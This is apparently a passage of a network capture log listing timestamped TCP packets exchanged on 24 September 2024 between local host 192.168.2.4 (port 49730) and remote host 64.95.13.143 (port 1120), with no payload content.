Sep 24, 2024 17:46:12.874774933 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.874799013 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.874922991 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.874936104 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.874948025 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.874969006 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.874984980 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.875010967 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.875021935 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.875034094 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.875053883 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.875061035 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.875071049 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.875094891 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.875195980 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.875248909 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.875273943 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.875284910 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.875319004 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.875339985 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.875350952 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.875361919 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.875377893 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.875400066 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.875421047 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.875649929 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.875722885 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.875766039 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.875921011 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.875932932 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.875972033 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.876171112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.876183987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.876197100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.876213074 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.876219988 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.876230955 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.876260042 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.877420902 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.877433062 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.877444983 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.877476931 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.877510071 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.877517939 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.877528906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.877542973 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.877556086 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.877567053 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.877588034 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.938111067 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.938210964 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.938225031 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.938292027 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.939585924 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.939601898 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.939615011 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.939636946 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.939644098 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.939661026 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.959239960 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.959255934 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.959270954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.959316015 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.959330082 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.959342957 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.959352016 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.959364891 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.959376097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.959400892 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.959436893 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.959553957 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.964876890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.964891911 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.964905977 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.964932919 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.964947939 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.965018034 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.965029955 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.965043068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.965055943 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.965064049 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.965076923 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.965101004 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.965368986 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.965380907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.965392113 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.965406895 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.965414047 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.965429068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.965435982 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.965447903 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.965471029 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.965789080 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.965801001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.965815067 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.965828896 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.965853930 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.965859890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.965871096 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.965881109 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.965894938 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.965909958 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.965939999 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.966100931 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.966113091 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.966124058 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.966135979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.966147900 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.966169119 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.966173887 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.966183901 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.966196060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.966209888 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.966226101 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.966233969 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.966247082 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.966270924 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.966286898 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.966707945 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.966720104 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.966732979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.966758966 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.966891050 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.966902018 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.966914892 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.966932058 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.966941118 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.966954947 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.966965914 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.966976881 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.966989040 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.966999054 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.967010021 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.967025042 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.967031002 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.967056036 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.967978954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.967992067 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.968003988 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.968031883 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.968060017 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.968074083 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.968085051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.968096018 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.968106031 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.968116045 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.968791962 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.968803883 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.968820095 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.968869925 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.968880892 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.968894005 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.968907118 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.968971014 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.968988895 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.969005108 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.969037056 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.969655037 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.969669104 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.969691992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.969703913 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.969717979 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.969728947 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.969739914 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.969773054 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.969784975 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.969801903 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.969810963 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.969821930 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.969835043 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.969841957 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.969856024 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.969866991 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.969881058 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.969904900 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.971000910 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.971018076 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.971030951 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.971079111 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.971138000 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.971149921 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.971162081 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.971179008 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.971185923 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.971199036 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.973268986 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.973287106 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.973299026 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.973319054 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.973351002 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.973670006 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.973684072 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.973695040 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.973706961 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.973717928 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.973727942 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.973753929 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.974526882 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.974541903 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.974556923 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.974597931 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.974597931 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.974633932 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.974646091 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.974667072 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.974679947 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.974689007 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.974728107 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.975749969 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.975761890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.975775957 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.975801945 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.976046085 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.976058006 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.976069927 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.976082087 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.976092100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.976100922 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.029393911 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.030631065 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.030644894 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.030658007 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.030708075 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.030772924 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.030786037 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.030798912 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.030814886 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.030822039 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.030833006 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.030842066 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.030872107 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.053661108 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.053683043 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.053699017 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.053756952 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.053792000 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.053805113 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.053817987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.053829908 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.053841114 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.053853989 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.053864002 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.053890944 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.057621956 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.057635069 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.057648897 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.057687998 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.057784081 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.057796955 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.057809114 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.057823896 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.057836056 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.057854891 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.058130026 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058141947 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058155060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058168888 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.058173895 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058185101 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.058196068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058209896 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058223009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058233023 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.058252096 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.058295012 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058377981 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058389902 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058401108 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058418036 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058427095 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.058434963 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.058445930 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058458090 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058491945 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.058769941 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058824062 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.058832884 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058845043 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058859110 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058873892 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058881998 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.058892965 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058906078 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058916092 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.058927059 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.058942080 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.059123993 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.059135914 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.059165001 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.059176922 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.059200048 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.059212923 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.059222937 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.059233904 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.059247971 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.059257030 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.059286118 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.059853077 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.059865952 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.059878111 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.059896946 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.059907913 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.059917927 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.059932947 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.059938908 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.059950113 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.059964895 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.064224958 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064237118 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064249992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064268112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064275980 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064277887 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064280987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064296961 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.064304113 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064316988 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064328909 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064344883 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064353943 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.064361095 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.064383030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064397097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064409018 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:13.064418077 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:13.064428091 CEST	49730	1120	192.168.2.4	64.95.13.143
